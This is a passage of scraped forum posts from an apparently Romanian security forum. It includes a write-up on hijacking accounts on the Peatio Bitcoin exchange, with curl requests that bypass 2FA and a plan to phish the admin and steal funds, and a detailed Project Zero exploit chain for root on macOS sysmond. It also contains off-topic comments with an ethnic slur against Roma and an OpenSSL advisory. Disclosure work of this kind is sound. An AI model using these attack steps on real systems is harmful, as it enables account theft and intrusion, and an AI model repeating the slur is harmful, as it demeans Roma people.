hijack any peatio account and only last one requires JS. Step 2: Bypassing 2 Factor Authentication For users with Google Authenticator activated There’s a gaping hole in SmsAuthsController - two_factor_required! is only called for show action, but not for update which is actually responsible for activating SMS 2FA. before_action :auth_member! before_action :find_sms_auth before_action :activated? before_action :two_factor_required!, only: [:show] def show @phone_number = Phonelib.parse(current_user.phone_number).national end def update if params[:commit] == 'send_code' send_code_phase else verify_code_phase end end We can activate new SMS authenticator simply sending following requests straight to update action. curl ‘http://app/verify/sms_auth’ -H ‘X-CSRF-Token:ZPwrQuLJ3x7md3wolrCTE6HItxkwOiUNHlekDPRDkwI=’ -H ‘Cookie:_peatio_session=SID’ –data ‘_method=patch&sms_auth%5Bcountry%5D=DE&sms_auth%5B phone_number%5D=9123222211&commit=send_code’ curl ‘http://app/verify/sms_auth’ -H ‘X-CSRF-Token:ZPwrQuLJ3x7md3wolrCTE6HItxkwOiUNHlekDPRDkwI=’ -H ‘Cookie:_peatio_session=SID’ –data ‘_method=patch&sms_auth%5Bcountry%5D=DE&sms_auth%5B phone_number%5D=9123222211&sms_auth%5Botp%5D=CODE_WE_RECEIVED’ For users with both Authenticator and SMS Peatio doesn’t store failed attempts for OTP so it’s very easy to bruteforce both App and SMS OTPs, it will take less than 3 days. For more details check our OTP Bruteforce Calculator For users with SMS 2FA only two_factor_by_type method doesn’t use activated scope so even inactive 2FA models can be used. Thus we are not going to brute SMS auth because the victim will start receiving suspicious SMS. We still can bruteforce Google Authenticator because it has seed generated and verify? method is working fine. def two_factor_by_type current_user.two_factors.by_type(params[:id]) end Furthermore, SMS 2FA has two more issues def gen_code self.otp_secret = OTP_LENGTH.times.map{ Random.rand(9) + 1 }.join self.refreshed_at = Time.now end First issue is Random.rand is based on PRNG (Mersenne Twister) which is easily predictable once you have enough subsequently generated numbers. Second issue is rand(9) can only generate numbers from 0 to 8 so total number of combinations will be 9^6=531441 almost twice less than 1,000,000 and twice easier to bruteforce than App 2FA. With tricks outlined above we can bypass 2FA for any user. In worst case scenario it takes less than 3 days. If the victim has only Google Authenticator it takes less than 5 seconds to set up new SMS authenticator. Step 3: Attacking the admin Alright, we can hijack the account and bypass 2FA for any user, so we can steal the Bitcoins from anyone who visits our page. Still we need a lot of users to trick into clicking our phishy links. Let’s focus on just one of them - the admin. The simplest way to make the admin visit our link is to create a support ticket with something like “What is wrong with my account can you please check? http://i.will.hack.you/now”. Then we hack 2FA to get into the /admin panel: Unfortunately, this is the worst part. The admin of Peatio can do just few more things than a regular user. Nothing like “Send all the coins to this bad guy” or “Show API keys of all users”. can :update, Proof can :manage, Document can :manage, Member can :manage, Ticket can :manage, IdDocument can :manage, TwoFactor can :menu, Deposit can :manage, Deposit can :manage, ::Deposits::Bank can :manage, ::Deposits::Satoshi can :menu, Withdraw can :manage, ::Withdraws::Bank can :manage, ::Withdraws::Satoshi The only thing we found is creating a fiat deposit of like 99999999 Chinese Yuan and then accepting it by an admin. Then we can buy all available Bitcoins and altcoins to withdraw them. However not all Bitcoins are on orders. Doing it in stealth mode for a week can bring better results than closing all the orders in rush mode. Yunbi assets: 1636 BTC in total and ~350 in the hot wallet Our bounty: 1 BTC. It wasn’t about money though. The full report in PDF is available upon request. Sursa: Hacking a Bitcoin Exchange
-
Bre, ti-am zis sa nu mai fumezi toate prostiile. Good guy Familia Rockefeller, vrea sa salveze planeta diminuand specia distructiva: omul. Le dam noi tigani sa testeze Ebola pe ei.
-
Cinci teorii ale conspiraţiei care s-au dovedit a fi adevărate
Nytro replied to Che's topic in Discutii non-IT
Zeitgeist -
Aoleu... Alt "tutorial" scris de tiganii indieni. Realitatea e mai dura, baieti.
-
Violent Python A Cookbook for Hackers, Forensic Analysts, Penetration Testers and Security Engineers TJ. O’Connor Chapter 1: Introduction Chapter 2: Penetration Testing with Python Chapter 3: Forensic Investigations with Python Chapter 4: Network Traffic Analysis with Python Chapter 5: Wireless Mayhem with Python Chapter 6: Web Recon With Python Chapter 7: Antivirus Evasion with Python Download: http://t.co/6o6Q9XgnQN
-
[h=1]The little book about OS development[/h] [h=1]Contents[/h] 1 Introduction 1.1 About the Book 1.2 The Reader 1.3 Credits, Thanks and Acknowledgements 1.4 Changes and Corrections 1.5 License [*]2 First Steps 2.1 Tools 2.1.1 Quick Setup 2.1.2 Programming Languages 2.1.3 Host Operating System 2.1.4 Build System 2.1.5 Virtual Machine [*]2.2 Booting 2.2.1 BIOS 2.2.2 The Bootloader 2.2.3 The Operating System [*]2.3 Hello Cafebabe 2.3.1 Compiling the Operating System 2.3.2 Linking the Kernel 2.3.3 Obtaining GRUB 2.3.4 Building an ISO Image 2.3.5 Running Bochs [*]2.4 Further Reading [*]3 Getting to C 3.1 Setting Up a Stack 3.2 Calling C Code From Assembly 3.2.1 Packing Structs [*]3.3 Compiling C Code [*]3.4 Build Tools [*]3.5 Further Reading [*]4 Output 4.1 Interacting with the Hardware 4.2 The Framebuffer 4.2.1 Writing Text 4.2.2 Moving the Cursor 4.2.3 The Driver [*]4.3 The Serial Ports 4.3.1 Configuring the Serial Port 4.3.2 Configuring the Line 4.3.3 Configuring the Buffers 4.3.4 Configuring the Modem 4.3.5 Writing Data to the Serial Port 4.3.6 Configuring Bochs 4.3.7 The Driver [*]4.4 Further Reading [*]5 Segmentation 5.1 Accessing Memory 5.2 The Global Descriptor Table (GDT) 5.3 Loading the GDT 5.4 Further Reading [*]6 Interrupts and Input 6.1 Interrupts Handlers 6.2 Creating an Entry in the IDT 6.3 Handling an Interrupt 6.4 Creating a Generic Interrupt Handler 6.5 Loading the IDT 6.6 Programmable Interrupt Controller (PIC) 6.7 Reading Input from the Keyboard 6.8 Further Reading [*]7 The Road to User Mode 7.1 Loading an External Program 7.1.1 GRUB Modules [*]7.2 Executing a Program 7.2.1 A Very Simple Program 7.2.2 Compiling 7.2.3 Finding the Program in Memory 7.2.4 Jumping to the Code [*]7.3 The Beginning of User Mode [*]8 A Short Introduction to Virtual Memory 8.1 Virtual Memory Through Segmentation? 8.2 Further Reading [*]9 Paging 9.1 Why Paging? 9.2 Paging in x86 9.2.1 Identity Paging 9.2.2 Enabling Paging 9.2.3 A Few Details [*]9.3 Paging and the Kernel 9.3.1 Reasons to Not Identity Map the Kernel 9.3.2 The Virtual Address for the Kernel 9.3.3 Placing the Kernel at 0xC0000000 9.3.4 Higher-half Linker Script 9.3.5 Entering the Higher Half 9.3.6 Running in the Higher Half [*]9.4 Virtual Memory Through Paging [*]9.5 Further Reading [*]10 Page Frame Allocation 10.1 Managing Available Memory 10.1.1 How Much Memory is There? 10.1.2 Managing Available Memory [*]10.2 How Can We Access a Page Frame? [*]10.3 A Kernel Heap [*]10.4 Further reading [*]11 User Mode 11.1 Segments for User Mode 11.2 Setting Up For User Mode 11.3 Entering User Mode 11.4 Using C for User Mode Programs 11.4.1 A C Library [*]11.5 Further Reading [*]12 File Systems 12.1 Why a File System? 12.2 A Simple Read-Only File System 12.3 Inodes and Writable File Systems 12.4 A Virtual File System 12.5 Further Reading [*]13 System Calls 13.1 Designing System Calls 13.2 Implementing System Calls 13.3 Further Reading [*]14 Multitasking 14.1 Creating New Processes 14.2 Cooperative Scheduling with Yielding 14.3 Preemptive Scheduling with Interrupts 14.3.1 Programmable Interval Timer 14.3.2 Separate Kernel Stacks for Processes 14.3.3 Difficulties with Preemptive Scheduling [*]14.4 Further Reading [*]15 References Book: The little book about OS development
-
Baieti, ideea e buna, daca tot ati inceput va sugerez sa lucrati cat puteti la proiect pentru ca poate iesi frumos.
-
Recomand.
-
Reported by ianb.. @google.com, Oct 7, 2014 tested on OS X 10.9.5 - uses some hard-coded offsets which will have to be fixed-up for other versions! this poc uses liblorgnette to resolve some private symbols; grab the code from github: git clone https://github.com/rodionovd/liblorgnette.git build this PoC with: clang -o sysmond_exploit_writeup sysmond_exploit_writeup.c liblorgnette/lorgnette.c -framework CoreFoundation sysmond is a daemon running as root. You can interact with sysmond via XPC ("com.apple.sysmond".) sub_100001AAF calls sub_100003120 passing the xpc dictionary received from the attacker. This function allocates a sysmond_request object and fills in fields from the attacker-controlled xpc request dictionary: ;read a uint64 with the key "Type" __text:0000000100003144 mov rax, cs:_SYSMON_XPC_KEY_TYPE_ptr __text:000000010000314B mov rsi, [rax] __text:000000010000314E mov rdi, r14 __text:0000000100003151 call _xpc_dictionary_get_uint64 __text:0000000100003156 mov [rbx+20h], rax ;rbx points to sysmond_request ;read anything with the key "Attributes" __text:000000010000315A mov rax, cs:_SYSMON_XPC_KEY_ATTRIBUTES_ptr __text:0000000100003161 mov rsi, [rax] __text:0000000100003164 mov rdi, r14 __text:0000000100003167 call _xpc_dictionary_get_value __text:000000010000316C mov [rbx+28h], rax ... continues parsing more fields The sysmond_request is returned from this function and passed as the first argument to sub_10000337D: __text:000000010000337D sub_10000337D proc near ; CODE XREF: sub_100001AAF+4Bp __text:000000010000337D __text:000000010000337D var_38 = qword ptr -38h __text:000000010000337D var_30 = dword ptr -30h __text:000000010000337D var_2C = dword ptr -2Ch __text:000000010000337D var_28 = qword ptr -28h __text:000000010000337D var_20 = qword ptr -20h __text:000000010000337D var_18 = qword ptr -18h __text:000000010000337D __text:000000010000337D push rbp __text:000000010000337E mov rbp, rsp __text:0000000100003381 push r14 __text:0000000100003383 push rbx __text:0000000100003384 sub rsp, 30h __text:0000000100003388 mov rbx, rdi ; sysmond_request pointer __text:000000010000338B mov rdi, [rbx+20h] ; "Type" uint64 value in the xpc request dictionary __text:000000010000338F mov rsi, [rbx+28h] ; "Attributes" value in the xpc request dictionary __text:0000000100003393 call sub_100003454 this function extracts the Type and Attribute values and passes them to sub_100003454: __text:0000000100003454 sub_100003454 proc near ; CODE XREF: sub_10000337D+16p __text:0000000100003454 ; handler+C0 p __text:0000000100003454 push rbp __text:0000000100003455 mov rbp, rsp __text:0000000100003458 push r15 __text:000000010000345A push r14 __text:000000010000345C push r12 __text:000000010000345E push rbx __text:000000010000345F mov r12, rsi ; this is "Attributes" value __text:0000000100003462 mov r14, rdi ; which was read from the dictionary with xpc_dictionary_get_value __text:0000000100003465 mov rdi, r12 ; meaning it could be any xpc type __text:0000000100003468 call _xpc_data_get_length ; use "Attributes" value as an xpc_data object __text:000000010000346D mov r15, rax __text:0000000100003470 mov rdi, r15 ; size_t __text:0000000100003473 call _malloc __text:0000000100003478 mov rbx, rax __text:000000010000347B mov rdi, r12 __text:000000010000347E mov rsi, rbx __text:0000000100003481 xor edx, edx __text:0000000100003483 mov rcx, r15 __text:0000000100003486 call _xpc_data_get_bytes ; use "Attributes" value again interpreted as an xpc_data the xpc_data_get_bytes call is the interesting one: __text:00000000000114BE _xpc_data_get_bytes proc near __text:00000000000114BE push rbp __text:00000000000114BF mov rbp, rsp ... __text:00000000000114D2 mov r14, rsi __text:00000000000114D5 mov r13, rdi __text:00000000000114D8 cmp qword ptr [r13+28h], 0FFFFFFFFFFFFFFFFh __text:00000000000114DD jnz short loc_11515 ... __text:0000000000011515 lea rdi, [r13+28h] ; predicate __text:0000000000011519 lea rdx, __xpc_data_map_once ; function __text:0000000000011520 mov rsi, r13 ; context __text:0000000000011523 call _dispatch_once_f here, if the value at +28h isn't -1 then our xpc object will be passed as the context to __xpc_data_map_once: __text:00000000000028E9 __xpc_data_map_once proc near ; DATA XREF: _xpc_data_get_bytes_ptr+1Fo __text:00000000000028E9 ; __xpc_data_equal+46ao ... __text:00000000000028E9 push rbp __text:00000000000028EA mov rbp, rsp __text:00000000000028ED push r14 __text:00000000000028EF push rbx __text:00000000000028F0 mov rbx, rdi ; controlled xpc object __text:00000000000028F3 cmp byte ptr [rbx+48h], 0 ; if the byte at +48h is 0 __text:00000000000028F7 jnz short loc_291E __text:00000000000028F9 mov rdi, [rbx+30h] ; then pass the pointer at +30h __text:00000000000028FD lea rsi, [rbx+38h] __text:0000000000002901 lea rdx, [rbx+40h] __text:0000000000002905 call _dispatch_data_create_map ; to dispatch_data_create_map __text:000000000000290A mov r14, rax __text:000000000000290D mov rdi, [rbx+30h] ; object __text:0000000000002911 call _dispatch_release ; and then to dispatch_release we can return early from dispatch_data_create_map by setting the value at +28h from the pointer passed as the first arg to 0: __text:00000000000012B6 _dispatch_data_create_map proc near ; CODE XREF: __dispatch_data_subrange_map+34p __text:00000000000012B6 ; __dispatch_operation_perform+DEap __text:00000000000012B6 __text:00000000000012B6 push rbp __text:00000000000012B7 mov rbp, rsp __text:00000000000012BA push r15 __text:00000000000012BC push r14 __text:00000000000012BE push r13 __text:00000000000012C0 push r12 __text:00000000000012C2 push rbx __text:00000000000012C3 sub rsp, 38h __text:00000000000012C7 mov [rbp+var_58], rdx __text:00000000000012CB mov r15, rsi __text:00000000000012CE mov r14, rdi __text:00000000000012D1 mov r12, [r14+28h] ; if this is 0 __text:00000000000012D5 test r12, r12 __text:00000000000012D8 jz short loc_131C ; jumps to early return without disturbing anything else we then reach the call to dispatch_release which is passing the pointer at +30h of the xpc object we control (the API believes this is an xpc_data object) this ends up calling _dispatch_objc_release which sends the objective c "release" message to the object. We'll come back to how to get code code execution from that later. The crux of the bug is that the value of the "Attributes" key in the request dictionary is never validated to actually be an xpc_data object and the gets passed to functions expecting an xpc_data. In order to exploit this we need to have a value of a type other than xpc_data as the "Attributes" value in the request dictionary - specifically one where the offsets outlined above have suitably controlled values: +28h qword 0 +30h pointer to controlled data +48h byte 0 the xpc_uuid type comes the closest to fulfilling these requirements. We completely control the 16 bytes from +28h so the first two constraints are easily satisfied. Heap spraying is very reliable and fast in xpc, we can easily map a gigabyte of data into sysmond at a predicable address so we can point the pointer at +30h to that. The xpc_uuid object is only 40h bytes though, so we have no control over the byte at +48h which must be 0... OS X uses magazine malloc which is a heap-based allocator. It has three broad size classes (x<1k = tiny; 1k<x<15k = small; x>15k = large) and within these it will allocate approximately contiguously (using size-based free-lists to speed things up) with no inline-metadata which means there's a reasonable expectation that sequential allocations of similar sizes will be contiguous. Our xpc_uuid object is allocated when the request dictionary is received, so what's the next thing which is allocated? xpc_dictionaries have 6 hash buckets which store the heads of linked-lists for each bucket. As the dictionary is being deserialized first the value of a key is deserialized (allocating in this case the xpc_uuid) object then the entry is added to the linked-list (allocting a new linked-list entry struct.) The structure of a linked-list entry is approximately: struct ll { struct ll* forward; struct ll* backward; xpc_object_t* object; uint64_t flags; char key[0]; } This is a variable-size struct - the key is allocated inline. If the xpc_uuid is immediately followed in memory by its linked-list entry the the value at +48 will be the least-significant byte of the backward linked-list pointer. Our only requirement is that this byte be 0, which is easily achieved by ensuring that the previous linked-list entry struct in the list (which this linked-list entry points to) was allocated with an alignment of at least 256 bytes. The magazine malloc "small" size class heap chunks all have an alignment of 512 bytes meaning that we just need the linked-list entry prior to the xpc_uuid to be between 1k and 15k. In order for the key to end up in the right linked-list when it's deserialized we also need to make sure that the long key hashes to the same hash as "Attributes" - since there are only 6 possible hash values this is trivial. Finally, we can add another xpc_data object to the reqest dictionary with a gigabyte of heapspray as the value - this will be mapped into sysmond at a suitably predictable address meaning we can set the high 8 bytes of the uuid value to point to this. At this point we control a pointer to an objective-c object and the code will call objc_msgSend to "send a message" to our controlled object, which is the objective-c paradigm for calling methods. Let's look at the implementation of this to see how we can turn that into instruction pointer control: __text:000000000000117F __dispatch_objc_release proc near ; CODE XREF: _dispatch_release:loc_117Aj __text:000000000000117F ; _dispatch_data_create_subrange+183_p ... __text:000000000000117F mov rax, rdi __text:0000000000001182 cmp cs:__os_object_have_gc, 0 __text:0000000000001189 jnz short loc_119E __text:000000000000118B mov rcx, cs:msgRef_release__objc_msgSend_fixup __text:0000000000001192 lea rsi, msgRef_release__objc_msgSend_fixup __text:0000000000001199 mov rdi, rax __text:000000000000119C jmp rcx rdi points to our heap sprayed fake objective-c object. This code sets rsi to point to the msgRef_release__objc_msgSend_fixup structure then calls the value at that address which is objc_msgSend_fixup. msgRef_release__objc_msgSend_fixup is in the __objc_msgrefs section of the data segment and in lldb we can see that at runtime is has the following contents: { /usr/lib/libobjc.A.dylib`objc_msgSend_fixedup, "release" } and the implementation of objc_msgSend_fixedup is: (lldb) disassemble --name objc_msgSend_fixedup libobjc.A.dylib`objc_msgSend_fixedup: 0x7fff91d5d1c4: mov RSI, QWORD PTR [RSI + 8] 0x7fff91d5d1c8: jmpq 0x7fff91d5d080 ; objc_msgSend which just calls through to objc_msgSend passing the address of the "release" string as the second argument: (lldb) disassemble --name objc_msgSend libobjc.A.dylib`objc_msgSend: 0x7fff91d5d080: test RDI, RDI 0x7fff91d5d083: je 0x7fff91d5d0f8 0x7fff91d5d086: test DIL, 1 0x7fff91d5d08a: jne 0x7fff91d5d10f 0x7fff91d5d091: mov R11, QWORD PTR [RDI] ; rdi points to controlled fake objective-c object - read pointer to objective-c class 0x7fff91d5d094: mov R10, RSI ; copy selector (pointer to string of method to call) to r10 0x7fff91d5d097: and R10D, DWORD PTR [R11 + 24] ; mask off n upper bits of the pointer according to value of fake_class+18h 0x7fff91d5d09b: shl R10, 4 ; 0x7fff91d5d09f: add R10, QWORD PTR [R11 + 16] ; use that masked off value as an index into a cache array pointed to by fake_class+10h 0x7fff91d5d0a3: cmp RSI, QWORD PTR [R10] ; does the cache entry selector match the selector passed as the second arg? 0x7fff91d5d0a6: jne 0x7fff91d5d0ac 0x7fff91d5d0a8: jmp QWORD PTR [R10 + 8] ; if so, then call the cached function implementation address Objective-c classses cache the addresses of the selector strings, not the contents of the strings so in order to exploit this we need to be able to find the address of the "release" selector passed by _dispatch_objc_release so we can construct a fake selector cache. All these libraries are loaded at the same address in all processes so we can just find the selector address in this process and it'll be valid for sysmond. Having done this we get instruction pointer control. At this point rax and rdi point to the heap spray so this PoC uses a pivot gadget in CoreFoundation to move the stack to point into the heap spray and ROP to a system() call with controlled string (the poc does "touch /tmp/hello_root" as root ) [TABLE] [TR] [TD=width: 20] [/TD] [TD] sysmond_exploit_writeup.c 19.6 KB Download[/TD] [/TR] [/TABLE] Sursa: https://code.google.com/p/google-security-research/issues/detail?id=121
-
- 1
-
-
OpenSSL Security Advisory [08 Jan 2015] ======================================= DTLS segmentation fault in dtls1_get_record (CVE-2014-3571) =========================================================== Severity: Moderate A carefully crafted DTLS message can cause a segmentation fault in OpenSSL due to a NULL pointer dereference. This could lead to a Denial Of Service attack. This issue affects all current OpenSSL versions: 1.0.1, 1.0.0 and 0.9.8. OpenSSL 1.0.1 DTLS users should upgrade to 1.0.1k. OpenSSL 1.0.0 DTLS users should upgrade to 1.0.0p. OpenSSL 0.9.8 DTLS users should upgrade to 0.9.8zd. This issue was reported to OpenSSL on 22nd October 2014 by Markus Stenberg of Cisco Systems, Inc. The fix was developed by Stephen Henson of the OpenSSL core team. DTLS memory leak in dtls1_buffer_record (CVE-2015-0206) ======================================================= Severity: Moderate A memory leak can occur in the dtls1_buffer_record function under certain conditions. In particular this could occur if an attacker sent repeated DTLS records with the same sequence number but for the next epoch. The memory leak could be exploited by an attacker in a Denial of Service attack through memory exhaustion. This issue affects OpenSSL versions: 1.0.1 and 1.0.0. OpenSSL 1.0.1 DTLS users should upgrade to 1.0.1k. OpenSSL 1.0.0 DTLS users should upgrade to 1.0.0p. This issue was reported to OpenSSL on 7th January 2015 by Chris Mueller who also provided an initial patch. Further analysis was performed by Matt Caswell of the OpenSSL development team, who also developed the final patch. no-ssl3 configuration sets method to NULL (CVE-2014-3569) ========================================================= Severity: Low When openssl is built with the no-ssl3 option and a SSL v3 ClientHello is received the ssl method would be set to NULL which could later result in a NULL pointer dereference. This issue affects all current OpenSSL versions: 1.0.1, 1.0.0 and 0.9.8. OpenSSL 1.0.1 users should upgrade to 1.0.1k. OpenSSL 1.0.0 users should upgrade to 1.0.0p. OpenSSL 0.9.8 users should upgrade to 0.9.8zd. This issue was reported to OpenSSL on 17th October 2014 by Frank Schmirler. The fix was developed by Kurt Roeckx. ECDHE silently downgrades to ECDH [Client] (CVE-2014-3572) ========================================================== Severity: Low An OpenSSL client will accept a handshake using an ephemeral ECDH ciphersuite using an ECDSA certificate if the server key exchange message is omitted. This effectively removes forward secrecy from the ciphersuite. This issue affects all current OpenSSL versions: 1.0.1, 1.0.0 and 0.9.8. OpenSSL 1.0.1 users should upgrade to 1.0.1k. OpenSSL 1.0.0 users should upgrade to 1.0.0p. OpenSSL 0.9.8 users should upgrade to 0.9.8zd. This issue was reported to OpenSSL on 22nd October 2014 by Karthikeyan Bhargavan of the PROSECCO team at INRIA. The fix was developed by Stephen Henson of the OpenSSL core team. RSA silently downgrades to EXPORT_RSA [Client] (CVE-2015-0204) ============================================================== Severity: Low An OpenSSL client will accept the use of an RSA temporary key in a non-export RSA key exchange ciphersuite. A server could present a weak temporary key and downgrade the security of the session. This issue affects all current OpenSSL versions: 1.0.1, 1.0.0 and 0.9.8. OpenSSL 1.0.1 users should upgrade to 1.0.1k. OpenSSL 1.0.0 users should upgrade to 1.0.0p. OpenSSL 0.9.8 users should upgrade to 0.9.8zd. This issue was reported to OpenSSL on 22nd October 2014 by Karthikeyan Bhargavan of the PROSECCO team at INRIA. The fix was developed by Stephen Henson of the OpenSSL core team. DH client certificates accepted without verification [Server] (CVE-2015-0205) ============================================================================= Severity: Low An OpenSSL server will accept a DH certificate for client authentication without the certificate verify message. This effectively allows a client to authenticate without the use of a private key. This only affects servers which trust a client certificate authority which issues certificates containing DH keys: these are extremely rare and hardly ever encountered. This issue affects OpenSSL versions: 1.0.1 and 1.0.0. OpenSSL 1.0.1 users should upgrade to 1.0.1k. OpenSSL 1.0.0 users should upgrade to 1.0.0p. This issue was reported to OpenSSL on 22nd October 2014 by Karthikeyan Bhargavan of the PROSECCO team at INRIA. The fix was developed by Stephen Henson of the OpenSSL core team. Certificate fingerprints can be modified (CVE-2014-8275) ======================================================== Severity: Low OpenSSL accepts several non-DER-variations of certificate signature algorithm and signature encodings. OpenSSL also does not enforce a match between the signature algorithm between the signed and unsigned portions of the certificate. By modifying the contents of the signature algorithm or the encoding of the signature, it is possible to change the certificate's fingerprint. This does not allow an attacker to forge certificates, and does not affect certificate verification or OpenSSL servers/clients in any other way. It also does not affect common revocation mechanisms. Only custom applications that rely on the uniqueness of the fingerprint (e.g. certificate blacklists) may be affected. This issue affects all current OpenSSL versions: 1.0.1, 1.0.0 and 0.9.8. OpenSSL 1.0.1 users should upgrade to 1.0.1k. OpenSSL 1.0.0 users should upgrade to 1.0.0p. OpenSSL 0.9.8 users should upgrade to 0.9.8zd. One variant of this issue was discovered by Antti Karjalainen and Tuomo Untinen from the Codenomicon CROSS program and reported to OpenSSL on 1st December 2014 by NCSC-FI Vulnerability Co-ordination. Another variant was independently reported to OpenSSL on 12th December 2014 by Konrad Kraszewski from Google. Further analysis was conducted and fixes were developed by Stephen Henson of the OpenSSL core team. Bignum squaring may produce incorrect results (CVE-2014-3570) ============================================================= Severity: Low Bignum squaring (BN_sqr) may produce incorrect results on some platforms, including x86_64. This bug occurs at random with a very low probability, and is not known to be exploitable in any way, though its exact impact is difficult to determine. The following has been determined: *) The probability of BN_sqr producing an incorrect result at random is very low: 1/2^64 on the single affected 32-bit platform (MIPS) and 1/2^128 on affected 64-bit platforms. *) On most platforms, RSA follows a different code path and RSA operations are not affected at all. For the remaining platforms (e.g. OpenSSL built without assembly support), pre-existing countermeasures thwart bug attacks [1]. *) Static ECDH is theoretically affected: it is possible to construct elliptic curve points that would falsely appear to be on the given curve. However, there is no known computationally feasible way to construct such points with low order, and so the security of static ECDH private keys is believed to be unaffected. *) Other routines known to be theoretically affected are modular exponentiation, primality testing, DSA, RSA blinding, JPAKE and SRP. No exploits are known and straightforward bug attacks fail - either the attacker cannot control when the bug triggers, or no private key material is involved. This issue affects all current OpenSSL versions: 1.0.1, 1.0.0 and 0.9.8. OpenSSL 1.0.1 users should upgrade to 1.0.1k. OpenSSL 1.0.0 users should upgrade to 1.0.0p. OpenSSL 0.9.8 users should upgrade to 0.9.8zd. This issue was reported to OpenSSL on 2nd November 2014 by Pieter Wuille (Blockstream) who also suggested an initial fix. Further analysis was conducted by the OpenSSL development team and Adam Langley of Google. The final fix was developed by Andy Polyakov of the OpenSSL core team. [1] http://css.csail.mit.edu/6.858/2013/readings/rsa-bug-attacks.pdf Note ==== As per our previous announcements and our Release Strategy (https://www.openssl.org/about/releasestrat.html), support for OpenSSL versions 1.0.0 and 0.9.8 will cease on 31st December 2015. No security updates for these releases will be provided after that date. Users of these releases are advised to upgrade. References ========== URL for this Security Advisory: https://www.openssl.org/news/secadv_20150108.txt Note: the online version of the advisory may be updated with additional details over time. For details of OpenSSL severity classifications please see: https://www.openssl.org/about/secpolicy.html Sursa: https://www.openssl.org/news/secadv_20150108.txt